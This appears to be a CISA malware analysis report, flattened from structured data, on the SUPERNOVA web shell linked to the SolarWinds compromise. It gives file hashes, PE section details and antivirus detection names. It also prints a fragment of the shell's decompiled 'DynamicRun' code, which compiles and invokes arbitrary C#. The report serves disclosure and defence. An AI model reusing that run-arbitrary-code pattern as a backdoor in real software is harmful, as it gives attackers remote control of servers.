MAR-10319053.r1.v2
Malware Characterization
//node() | //@*
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.
cisa
2021-11-16T14:44:50-05:00
BMachine
134
7.1.0
1.ps1
10609
ASCII text, with very long lines
MD5
4423a4353a0e7972090413deb40d56ad
SHA1
8004d78e6934efb4dea8baf48a589c2c1ed10bf3
SHA256
290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515
SHA512
5d2dee3c8e4c6a4fa1d84e434ab0b864245fae51360e03ed7338c2b40d7c1d61aad755f8c54615197100dd3b8bfd00d33b256178123002b7c07779c257fa13db
SSDEEP
192:9x2OrPgH8XWECNsW4IX4SLY0tqIeZ9StIGca/HjKxnlyImIwN:Fr28XWECNsbIX4SLY0BeZ9StI9OHjMlw
4.457683
Contains
) Enumerable.Select((IEnumerable) compilerResults.Errors.Cast(), (Func) (LogoImageHandler.\u003C\u003Ec.\u003C\u003E9__3_0 ?? (LogoImageHandler.\u003C\u003Ec.\u003C\u003E9__3_0 = new Func((object) LogoImageHandler.\u003C\u003Ec.\u003C\u003E9, __methodptr(\u003CDynamicRun\u003Eb__3_0))))));
Console.WriteLine("error");
return compilerResults.Errors.ToString();
}
object instance = compilerResults.CompiledAssembly.CreateInstance(clazz);
return (string) instance.GetType().GetMethod(method).Invoke(instance, (object[]) args);
}
--End DynamicRun Function--]]>
App_Web_logoimagehandler.ashx.b6031896.dll
7680
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5
56ceb6d0011d87b6e4d7023d7ef85676
SHA1
75af292f34789a1c782ea36c7127bf6106f595e8
SHA256
c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71
SHA512
f7eac6ab99fe45ca46417cdca36ba27560d5f8a2f37f378ba97636662595d55fa34f749716971aa96a862e37e0199eb6cb905636e6ab0123cfa089adba450629
SSDEEP
192:8/SqRzbt0GBDawA5uT8wSlyDDGTBNFkQ:8/SyHKGBDax5uThDD6BNr
Microsoft Visual C# / Basic .NET
4.62245
4
2020-03-24 05:16:10-04:00
512
MD5
21556dbcb227ba907e33b0847b427ef4
2.597488
None
0.0.0.0
App_Web_logoimagehandler.ashx.b6031896.dll
App_Web_logoimagehandler.ashx.b6031896.dll
None
0.0.0.0
.text
5632
5.285309
MD5
9002a963c87901397a986c3333d09627
.rsrc
1024
2.583328
MD5
78888431b10a2bf283387437a750bca3
.reloc
512
0.081539
MD5
45ded0a8dacde15cb402adfe11b0fe3e
Contained_Within
Characterized_By
Figure 1
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
4423a4353a0e7972090413deb40d56ad
SHA1
8004d78e6934efb4dea8baf48a589c2c1ed10bf3
SHA256
290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515
NCCIC
2021-11-17T14:31:17+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
56ceb6d0011d87b6e4d7023d7ef85676
SHA1
75af292f34789a1c782ea36c7127bf6106f595e8
SHA256
c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71
NCCIC
2021-11-17T14:31:17+00:00
MAEC Characterization of 4423a4353a0e7972090413deb40d56ad
Microsoft Security Essentials
Trojan:MSIL/Solorigate.G!dha
trojan
MAEC Characterization of 56ceb6d0011d87b6e4d7023d7ef85676
Antiy
Trojan/MSIL.Agent
McAfee
Trojan-sunburst
K7
Trojan ( 00574a531 )
Systweak
trojan-backdoor.sunburst-r
Cyren
W32/Supernova.GYFL-6114
Symantec
Backdoor.SuperNova
Zillya!
Trojan.SunBurst.Win32.3
Clamav
Win.Countermeasure.SUPERNOVA-9808999-1
BitDefender
Trojan.Supernova.A
Microsoft Security Essentials
Trojan:MSIL/Solorigate.G!dha
Sophos
Mal/Sunburst-B
Comodo
Backdoor
TrendMicro House Call
Trojan.59AF4B5F
TrendMicro
Trojan.59AF4B5F
Emsisoft
Trojan.Supernova.A (B)
Avira
TR/Sunburst.BR
VirusBlokAda
TScope.Trojan.MSIL
Ahnlab
Backdoor/Win32.SunBurst
ESET
a variant of MSIL/SunBurst.A trojan
NANOAV
Trojan.Win32.Sunburst.iduxaq
Lavasoft
Trojan.Supernova.A
Quick Heal
Backdoor.Sunburst
Ikarus
Backdoor.Sunburst
backdoor
10319053.r1.v2
Malicious Code
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected